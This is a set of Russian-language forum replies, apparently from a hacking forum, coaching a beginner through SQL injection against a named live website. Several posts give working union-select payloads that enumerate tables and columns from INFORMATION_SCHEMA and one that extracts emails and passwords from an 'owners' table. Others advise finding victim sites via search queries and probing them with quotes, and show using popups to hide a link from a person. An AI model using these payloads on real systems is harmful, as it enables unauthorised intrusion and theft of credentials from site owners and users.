Два чаю этому господину.
Восстаньте же из пепла!

мне нравица
можно запускать.

Наверно тебе стоит почитать статеек/книжек/манов по mysql. Но они такие скучные, так что я не буду этого советовать. =)
[QUOTE=ktulx;135722]
Всё тот же пример
[CODE]http://infored.ru/login/check_user/[email protected]/12345678'%20union%20select%201,COLUMN_NAME,3,4,5,6,7%20from%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME='owners'%20and%20'1'='1[/CODE]
проходит и даёт мне название столбца — id
Если добавляю «LIMIT 0,1» — ошибка. Почему? В таком случае как узнать и как вы узнали имена остальных столбцов? Брут?
[/quote]Я ж уже писал — плохой это пример. Лучше найди хороший и практикуйся на нем :)
Согласно ээ… спецификации sql, [B]limit[/B] должен быть после [B]where[/B]. Тут так не выйдет, потому что [B]where[/B] с '1'='1 должен стоять вконце и закрывать кавычку. Вот оно и ругается. Перебрать можно так:

http://infored.ru/login/check_user/[email protected]/12345678' union select 1,COLUMN_NAME,3,4,5,6,7 from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='owners' and column_name!='id' and '1'='1

http://infored.ru/login/check_user/[email protected]/12345678' union select 1,COLUMN_NAME,3,4,5,6,7 from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='owners' and column_name!='id' and column_name!='cid' and '1'='1

и т.д.
[QUOTE=ktulx;135722]
[CODE]http://infored.ru/login/check_user/[email protected]/12345678'%20union%20select%201,TABLE_NAME,3,4,5,6,7%20from%20INFORMATION_SCHEMA.TABLES%20and%20'1'='1[/CODE]
не проходит совсем. почему? Доступ к information_schema есть. Как тогда таблицы находить? Тоже перебор?
[/quote]Ну… все из-за тех же непрочитанных манов по mysql. :)
Условие должно быть в [B]where[/B], а [B]and[/B] — это если больше одного условия. Правильный вариант:
[CODE]http://infored.ru/login/check_user/[email protected]/12345678' union select 1,TABLE_NAME,3,4,5,6,7 from INFORMATION_SCHEMA.TABLES where '1'='1[/CODE]Дальше там будет штук 16 скучных стандартных таблиц. Убрать которые можно так:
[CODE]http://infored.ru/login/check_user/[email protected]/12345678' union select 1,TABLE_NAME,3,4,5,6,7 from INFORMATION_SCHEMA.TABLES where table_schema!='information_schema' and '1'='1[/CODE]
Ну а остальные уже перебирать, как и столбцы:
[CODE]http://infored.ru/login/check_user/[email protected]/12345678' union select 1,TABLE_NAME,3,4,5,6,7 from INFORMATION_SCHEMA.TABLES where table_name!='battles' and table_schema!='information_schema' and '1'='1[/CODE]
[QUOTE=ktulx;135722]
И ещё такой размытый вопрос: как мне, будучи нубом, отличить ситуацию с фильтрацией определённого символа от чего то еще (например от ошибки с моей стороны)? Можно как то на 100% убедиться что какой то символ фильтруется?
[/quote]Хм, будучи нубом наверно никак. Просто нужно понимать, какой запрос правильный, а какой — нет. И если правильный запрос не проходит, значит имеет место фильтрация или что-то типо того.
[QUOTE=ktulx;135722]
Ну и вот из нового
[CODE]http://сайт/2009/index.php?id=13'[/CODE]
получаю ошибку базы данных.
делаю так
[CODE]http://сайт/2009/index.php?id=13'%20union%20select%201,2%20&&%20'1'='1[/CODE]
все кавычки закрыты, всё красиво, но получаю ту же ошибку, вместо сообщения о неверном количестве столбцов.
[/quote]Даже не знаю, откуда ты такой запрос взял. =)
Для того, чтобы отрезать кавычку обычно юзают /*,+--+ или %23. На том сайте, который мы уже который день доканываем, такое не проходит. Поэтому там мы используем and '1'='1.
Вобщем вот тебе правильные запросы:
[code]
сайт/2009/index.php?id=13' union select 1,2/*
или
сайт/2009/index.php?id=13' union select 1,2 —
[/code]В нормальных скулях можно юзать плюcы, вместо пробелов, оно так красивей выходит =)

http://сайт/2009/index.php?id=13'+union+select+1,2/*

может там и не нужна кавычка после цифры:

http://сайт/2009/index.php?id=13+union+select+1,2/*

Если уж так хочется and '1'='1, то нужно знать хотя бы одну существующую там таблицу. Т.е.

http://сайт/2009/index.php?id=13'+union+select+1,2+from+information_schema.tables+where+'1'='1

Если это 4-й mysql, там не будет information_schema.
Ну про то, что столбы лучше перебирать через order+by+1, я рассказывать не буду, манов по этому и так достаточно.
[QUOTE=ktulx;135722]
а вот так
[CODE]http://сайт/2009/index.php?id=13'+'2'='2[/CODE]
на оформленной странице вылазит «Error in query 1c»
[/quote]Ээ… 1с. Может там и не sql-inj? Без урла сложно что-то сказать.
[QUOTE=ktulx;135722]
Кстати как бы я ни прописывал пробелы (+, %20, /**/ или просто пробел), в сообщении об ошибке они не переводятся собственно в пробелы. Это что то значит?[/QUOTE]Ну ты можешь что-то делать не так или пробелы могут фильтроваться или это не sql-inj. Хз вобщем. :)

Кстати скули для практики можно брать [URL=«forum.antichat.ru/threadedpost2739242.html»]отсюда[/URL]. Там же можно найти статьи по теме, например [URL=«forum.antichat.ru/thread43966.html»]вот[/URL].

Ну вот… пока я тут распинался, меня уже опередили. =(

А почему тогда не прокатывает 0x56455253494F4E2829 ?

Ну… потому что так нельзя) это просто вывод надписи, а не её исполнение.

И еще, возможно использование «id!=0» или «id<>0» ?

Угу. Но значение все равно только одно выведется.

что считать нормальной работой скрипта при использовании глючного параметра?

Ошибка есть, значит не нормальная работа. :)

Ну… все могло бы быть еще красивее. :)

кривой ты сайт нашел)
слэши фильтруются, скобки фильтруются, кавычку по-нормальному не отрежешь

http://infored.ru/login/check_user/[email protected]/12345678' union select 1,email,3,4,5,6,pass from owners where id=1 and '1'='1

http://infored.ru/login/check_owner/[email protected]/qwerty/

как-то так наверно

Ну если бы админ сидел в какой-нибудь кафешке с фри вай-фаем, а ты сидел бы за соседним столиком и снифал все пакеты. И он бы зашел оттуда в эту админку. То да, это очень опасно :D

После таких результатов, мне как нубу в этих делах, стоит забить на это дело и искать другую жертву, я правильно понимаю? )

угу

Если сайт на джумле, то ты его ни вручную, ни тем более Xspider`ом не сломаешь.
Ищи сплойты под эту версию, под модули всякие.

Что на практике даёт приведённая информация?

Ничего. Не знаю, что там за некорректные запросы, но это скорей всего не уязвимость.
Куки — это просто куки, они у каждого зашедшего свои и расшифровка их ничего не даст.
Trace — это что-то из серии мифов и легенд.
Можно еще поискать сплойты под ftp/ssh, но по-моему под эти ничего интересного нету.

Как определить тип базы данных?

Mysql (4 или 5). Вероятность 99% :)

А еще можно одну страницу читать с прокси, а другую без. =)

ээ… ab, siege
или я не правильно понял вопрос

А че случилось, то? Ну заходил бы сюда время от времени, писал бы чето. Зачем так пафосно уходить? =)

Пожалуйста =)

У тебя бд и сайт на одном сервере?
Ну закрой.
По идее можно и без фаервола обойтись.
В my.cnf

bind-address = 127.0.0.1

Можно еще skip-networking туда добавить.

Что конкретно поподробней?
tinyurl — это [url]http://tinyurl.com/[/url]
десяток попапов — это
[code]script language=«JavaScript» type=«text/javascript»>
for (var i = 0; i < 9; i++)
{
window.open('http://www.google.com/','','width=800,height=600');
}
[/code]Правда ff не хочет такое открывать.
А вот твой код не очень понятен. То ли оно само себя должно перезагружать со слипом, то ли редиректить куда-то.

Они тебе мешают? Ftp/ssh/http/dns/pop/imap/mysql/etc, закроешь хоть один и не сможешь извне получить доступ к какой-нибудь службе. В зависимости от ситуации, некоторые закрыть можно (вроде mysql), вот только зачем.
На сервере закрыть можно с помощью iptables/ipfw.

tinyurl?
Но она все равно будет видна. Только чуть позже.
Совсем скрыть нельзя. Да и зачем, туда никто не смотрит.
Можно открыть десяток попапов и человек точно не обратит внимания на то, какая ссылка у него в левом нижнем углу. =)

nmap -A 127.0.0.1

Link

антивирь, фаервол, еще какая-нить гадость может через себя весь трафик пропускать
мож торрент забыл выключить :)

С ней уже что-то случилось. Как раз 19 марта >_<

hrefer же
там справка есть… должна быть… вроде

Всмысле не загружая ОС? Тогда хз, про какой он авторан =)
Тут загрузчик надо типа граба или ntldr. А ПО такого нету, наверно. Заказывать надо.
И, да, весь диск будет долго качаться. Можно сделать загр. диск и ручками скопировать.
И не факт, что флешки на этом компе грузятся до ОС. Значит придется в биос лезть.

Но вообще хз. Я не шарю. lukitnev вон шарит. И за слова свои отвечает. И вообще он няшка :3

это и есть кука)

вообще странная какая-то форма авторизации
зачем ей все это вытаскивать и проверять только логин
1' union select 1,2,3,4--+ вывод есть?
без сайта сложно чето сказать

так ты не ищи уязвимые сайты)
shop site:com
shop site:uk
ну может я переборщил с запросами :D

в общем ищи просто сайты, какие-нибудь
а дальше уже броди по ссылкам, втыкай кавычки)